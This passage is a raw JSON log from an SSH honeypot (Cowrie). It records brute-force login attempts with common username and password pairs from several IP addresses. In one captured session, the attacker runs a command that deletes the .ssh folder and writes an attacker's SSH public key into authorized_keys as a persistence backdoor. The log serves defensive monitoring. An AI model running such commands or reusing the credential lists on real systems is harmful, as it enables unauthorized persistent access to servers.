03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:36:35.431892Z","src_ip":"167.99.49.89","session":"85c14e4a28e7"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-26T13:36:35.859863Z","src_ip":"167.99.49.89","session":"85c14e4a28e7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:36:36.958956Z","src_ip":"167.99.49.89","session":"85c14e4a28e7"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":33244,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6a425cf288c","protocol":"ssh","message":"New connection: 167.99.49.89:33244 (1.2.3.4:22) [session: d6a425cf288c]","sensor":"my-vps","timestamp":"2025-08-26T13:37:35.482970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:37:35.483963Z","src_ip":"167.99.49.89","session":"d6a425cf288c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:37:35.576147Z","src_ip":"167.99.49.89","session":"d6a425cf288c"}
{"eventid":"cowrie.login.failed","username":"ali","password":"ali@1234","message":"login attempt [ali/ali@1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:37:35.984944Z","src_ip":"167.99.49.89","session":"d6a425cf288c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:37:37.078898Z","src_ip":"167.99.49.89","session":"d6a425cf288c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45231,"dst_ip":"1.2.3.4","dst_port":22,"session":"114563bfcf4c","protocol":"ssh","message":"New connection: 212.227.235.229:45231 (1.2.3.4:22) [session: 114563bfcf4c]","sensor":"my-vps","timestamp":"2025-08-26T13:37:53.419907Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44495,"dst_ip":"1.2.3.4","dst_port":23,"session":"96bf8b3ad090","protocol":"telnet","message":"New connection: 212.227.125.160:44495 (1.2.3.4:23) [session: 96bf8b3ad090]","sensor":"my-vps","timestamp":"2025-08-26T13:38:20.949415Z"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":38098,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e1aba1a485f","protocol":"ssh","message":"New connection: 167.99.49.89:38098 (1.2.3.4:22) [session: 3e1aba1a485f]","sensor":"my-vps","timestamp":"2025-08-26T13:38:37.131101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:38:37.132049Z","src_ip":"167.99.49.89","session":"3e1aba1a485f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:38:37.222516Z","src_ip":"167.99.49.89","session":"3e1aba1a485f"}
{"eventid":"cowrie.login.failed","username":"user1","password":"1q2w3e4r","message":"login attempt [user1/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-26T13:38:37.634083Z","src_ip":"167.99.49.89","session":"3e1aba1a485f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:38:38.728329Z","src_ip":"167.99.49.89","session":"3e1aba1a485f"}
{"eventid":"cowrie.session.closed","duration":30.411819219589233,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:38:51.361136Z","src_ip":"212.227.125.160","session":"96bf8b3ad090"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53020,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd9473d632eb","protocol":"ssh","message":"New connection: 212.227.235.229:53020 (1.2.3.4:22) [session: bd9473d632eb]","sensor":"my-vps","timestamp":"2025-08-26T13:38:56.815706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:38:56.816447Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:38:57.047581Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc#2025","message":"login attempt [root/Abc#2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:38:58.012233Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:38:58.547150Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:38:58.548212Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:38:58.549814Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:38:58.780957Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:38:59.367902Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:38:59.368743Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:38:59.601522Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:38:59.602494Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53026,"dst_ip":"1.2.3.4","dst_port":22,"session":"af32cb50855d","protocol":"ssh","message":"New connection: 212.227.235.229:53026 (1.2.3.4:22) [session: af32cb50855d]","sensor":"my-vps","timestamp":"2025-08-26T13:38:59.831288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:38:59.831891Z","src_ip":"212.227.235.229","session":"af32cb50855d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:39:00.061689Z","src_ip":"212.227.235.229","session":"af32cb50855d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:39:01.022915Z","src_ip":"212.227.235.229","session":"af32cb50855d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:39:02.257758Z","src_ip":"212.227.235.229","session":"af32cb50855d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47214,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ca962b6753f","protocol":"ssh","message":"New connection: 212.227.235.229:47214 (1.2.3.4:22) [session: 4ca962b6753f]","sensor":"my-vps","timestamp":"2025-08-26T13:39:02.510631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:39:02.511841Z","src_ip":"212.227.235.229","session":"4ca962b6753f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:39:02.766192Z","src_ip":"212.227.235.229","session":"4ca962b6753f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:39:03.813831Z","src_ip":"212.227.235.229","session":"4ca962b6753f"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:39:04.068023Z","src_ip":"212.227.235.229","session":"bd9473d632eb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:39:04.069153Z","src_ip":"212.227.235.229","session":"4ca962b6753f"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":56056,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7b7017a07f1","protocol":"ssh","message":"New connection: 113.141.82.238:56056 (1.2.3.4:22) [session: a7b7017a07f1]","sensor":"my-vps","timestamp":"2025-08-26T13:39:16.137746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:39:16.138504Z","src_ip":"113.141.82.238","session":"a7b7017a07f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:39:17.255710Z","src_ip":"113.141.82.238","session":"a7b7017a07f1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Ubuntu1234","message":"login attempt [ubuntu/Ubuntu1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:39:18.580968Z","src_ip":"113.141.82.238","session":"a7b7017a07f1"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:39:19.807235Z","src_ip":"113.141.82.238","session":"a7b7017a07f1"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":45130,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbe7e7bfcbd6","protocol":"ssh","message":"New connection: 167.99.49.89:45130 (1.2.3.4:22) [session: bbe7e7bfcbd6]","sensor":"my-vps","timestamp":"2025-08-26T13:39:39.941314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:39:39.944144Z","src_ip":"167.99.49.89","session":"bbe7e7bfcbd6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:39:40.033787Z","src_ip":"167.99.49.89","session":"bbe7e7bfcbd6"}
{"eventid":"cowrie.login.failed","username":"user33","password":"user33","message":"login attempt [user33/user33] failed","sensor":"my-vps","timestamp":"2025-08-26T13:39:40.395280Z","src_ip":"167.99.49.89","session":"bbe7e7bfcbd6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:39:41.488614Z","src_ip":"167.99.49.89","session":"bbe7e7bfcbd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42278,"dst_ip":"1.2.3.4","dst_port":22,"session":"624c5bb3d7f0","protocol":"ssh","message":"New connection: 212.227.235.229:42278 (1.2.3.4:22) [session: 624c5bb3d7f0]","sensor":"my-vps","timestamp":"2025-08-26T13:39:44.495282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:39:45.100102Z","src_ip":"212.227.235.229","session":"624c5bb3d7f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:39:45.101811Z","src_ip":"212.227.235.229","session":"624c5bb3d7f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Mrinal@123","message":"login attempt [root/Mrinal@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:39:48.115545Z","src_ip":"212.227.235.229","session":"624c5bb3d7f0"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:39:48.694778Z","src_ip":"212.227.235.229","session":"624c5bb3d7f0"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:39:53.427440Z","src_ip":"212.227.235.229","session":"114563bfcf4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47768,"dst_ip":"1.2.3.4","dst_port":22,"session":"91944fd1b77a","protocol":"ssh","message":"New connection: 212.227.235.229:47768 (1.2.3.4:22) [session: 91944fd1b77a]","sensor":"my-vps","timestamp":"2025-08-26T13:40:24.028404Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37282,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba9b7b1dd423","protocol":"ssh","message":"New connection: 212.227.235.229:37282 (1.2.3.4:22) [session: ba9b7b1dd423]","sensor":"my-vps","timestamp":"2025-08-26T13:40:29.419776Z"}
